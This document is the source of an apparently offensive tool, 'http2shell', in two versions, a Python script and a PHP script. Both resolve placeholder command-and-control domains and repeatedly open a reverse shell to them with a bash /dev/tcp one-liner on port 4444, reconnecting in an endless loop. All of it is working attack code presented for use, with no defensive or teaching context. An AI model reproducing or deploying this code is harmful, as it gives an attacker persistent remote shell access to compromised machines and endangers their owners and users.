File: shell/http2shell.py
#!/usr/bin/python3
import os
import socket
from sys import stdout, exit
from time import sleep

c2httpsdomain   = "yourc2httpsdomain.com"
c2httpdomain    = "yourc2httpdomain.com"
c2defaultdomain = "127.0.0.1"
port = 4444

reset = "\033[0m"
red = "\033[31m"
darkgreen = "\033[38;5;22m"
orange = "\033[38;5;208m"
cyan = "\033[36m"
white = "\033[37m"
bold = "\033[1m"
dim = "\033[2m"
italic = "\033[3m"

banner = f"""
{bold}
{orange}    __    __  __       {red} ___{orange}        __         ____
{orange}   / /_  / /_/ /_____ {red} |__ \\{orange} _____/ /_  ___  / / /
{orange}  / __ \\/ __/ __/ __ \\{red} __/ /{orange}/ ___/ __ \\/ _ \\/ / /
{orange} / / / / /_/ /_/ /_/ /{red}/___/{orange}(__  ) / / /  __/ / /
{orange}/_/ /_/\\__/\\__/ .___/{red}/____/{orange}____/_/ /_/\\___/_/_/
{orange}             /_/
{bold}{red}  + {dim}{white}{italic}http2shell{reset}
{bold}{red}  + {dim}{white}{italic}author: tom7{reset}
{bold}{red}  + {dim}{white}{italic}github: https://github.com/tom7voldemort{reset}
{bold}{red}  + {dim}{white}{italic}version: 1.2{reset}
{reset}
"""

class strobj:
    def clear():
        os.system("clear")

    def typewrite(msg, delay=0.01):
        for ch in msg:
            stdout.write(ch)
            stdout.flush()
            sleep(delay)
        print()

    def info(msg):
        strobj.typewrite(f"{bold}{dim}{white}[{darkgreen}info +{white}] {msg}{reset}")

    def warnings(msg):
        strobj.typewrite(f"{bold}{dim}{white}[{orange}warn !{white}] {msg}{reset}")

    def errors(msg):
        strobj.typewrite(f"{bold}{dim}{white}[{red}error x{white}] {msg}{reset}")


class inet:
    def resolve():
        for Domain in [c2httpsdomain, c2httpdomain, c2defaultdomain]:
            try:
                ip = socket.gethostbyname(Domain)
                strobj.info(f"resolved {Domain} -> {ip}")
                return ip
            except Exception:
                continue
        return None

    def spawn(ip, port):
        try:
            strobj.info(f"spawning shell to {ip}:{port}")
            ret = os.system(f"bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'")
            return ret == 0
        except Exception as e:
            strobj.warnings(f"shell exit: {e}")
            return False


def exploit():
    while True:
        try:
            ip = inet.resolve()
            if not ip:
                strobj.errors("no server active. retrying...")
                sleep(3)
                continue
            strobj.info(f"target server: {ip}:{port}")
            strobj.info("starting shell session...")
            ok = inet.spawn(ip, port)
            if ok:
                strobj.info("shell session ended. reconnecting...")
            else:
                strobj.warnings("bad connection. retrying...")
            sleep(0.5)
        except KeyboardInterrupt:
            strobj.info("stopped.")
            exit(0)
        except Exception:
            sleep(0.5)


if __name__ == "__main__":
    strobj.clear()
    print(banner)
    exploit()

File: shell/http2shell.php
#!/usr/bin/php
<?php

$C2HttpsDomain   = "yourc2httpsdomain.com";
$C2HttpDomain    = "yourc2httpdomain.com";
$C2DefaultDomain = "127.0.0.1";
$Port            = 4444;

$Reset     = "\033[0m";
$Red       = "\033[31m";
$DarkGreen = "\033[38;5;22m";
$Orange    = "\033[38;5;208m";
$White     = "\033[37m";
$Bold      = "\033[1m";
$Dim       = "\033[2m";
$Italic    = "\033[3m";

$Banner = "
$Bold
{$Orange}    __    __  __       {$Red} ___{$Orange}        __         ____
{$Orange}   / /_  / /_/ /_____ {$Red} |__ \\{$Orange} _____/ /_  ___  / / /
{$Orange}  / __ \\/ __/ __/ __ \\{$Red} __/ /{$Orange}/ ___/ __ \\/ _ \\/ / /
{$Orange} / / / / /_/ /_/ /_/ /{$Red}/___/{$Orange}(__  ) / / /  __/ / /
{$Orange}/_/ /_/\\__/\\__/ .___/{$Red}/____/{$Orange}____/_/ /_/\\___/_/_/
{$Orange}             /_/
{$Bold}{$Red}  + {$Dim}{$White}{$Italic}http2shell{$Reset}
{$Bold}{$Red}  + {$Dim}{$White}{$Italic}author: tom7{$Reset}
{$Bold}{$Red}  + {$Dim}{$White}{$Italic}github: https://github.com/tom7voldemort{$Reset}
{$Bold}{$Red}  + {$Dim}{$White}{$Italic}version: 1.2{$Reset}
$Reset
";

function TypeWrite($Msg, $Delay = 10000) {
    for ($I = 0; $I < strlen($Msg); $I++) {
        echo $Msg[$I];
        usleep($Delay);
    }
    echo "\n";
}

function Info($Msg) {
    global $Bold, $Dim, $White, $DarkGreen, $Reset;
    TypeWrite("{$Bold}{$Dim}{$White}[{$DarkGreen}info +{$White}] {$Msg}{$Reset}");
}

function Warnings($Msg) {
    global $Bold, $Dim, $White, $Orange, $Reset;
    TypeWrite("{$Bold}{$Dim}{$White}[{$Orange}warn !{$White}] {$Msg}{$Reset}");
}

function Errors($Msg) {
    global $Bold, $Dim, $White, $Red, $Reset;
    TypeWrite("{$Bold}{$Dim}{$White}[{$Red}error x{$White}] {$Msg}{$Reset}");
}

function Resolve() {
    global $C2HttpsDomain, $C2HttpDomain, $C2DefaultDomain;
    foreach ([$C2HttpsDomain, $C2HttpDomain, $C2DefaultDomain] as $Domain) {
        $Ip = gethostbyname($Domain);
        if ($Ip !== $Domain) {
            Info("resolved $Domain -> $Ip");
            return $Ip;
        }
    }
    return null;
}

function Spawn($Ip, $Port) {
    Info("spawning shell to $Ip:$Port");
    $Ret = system("bash -c 'bash -i >& /dev/tcp/$Ip/$Port 0>&1'");
    return $Ret !== false;
}

function Exploit() {
    global $Port;
    while (true) {
        try {
            $Ip = Resolve();
            if (!$Ip) {
                Errors("no server active. retrying...");
                sleep(3);
                continue;
            }
            Info("target server: $Ip:$Port");
            Info("starting shell session...");
            $Ok = Spawn($Ip, $Port);
            if ($Ok) {
                Info("shell session ended. reconnecting...");
            } else {
                Warnings("bad connection. retrying...");
            }
            usleep(500000);
        } catch (Exception $E) {
            usleep(500000);
        }
    }
}

system("clear");
echo $Banner;
Exploit();
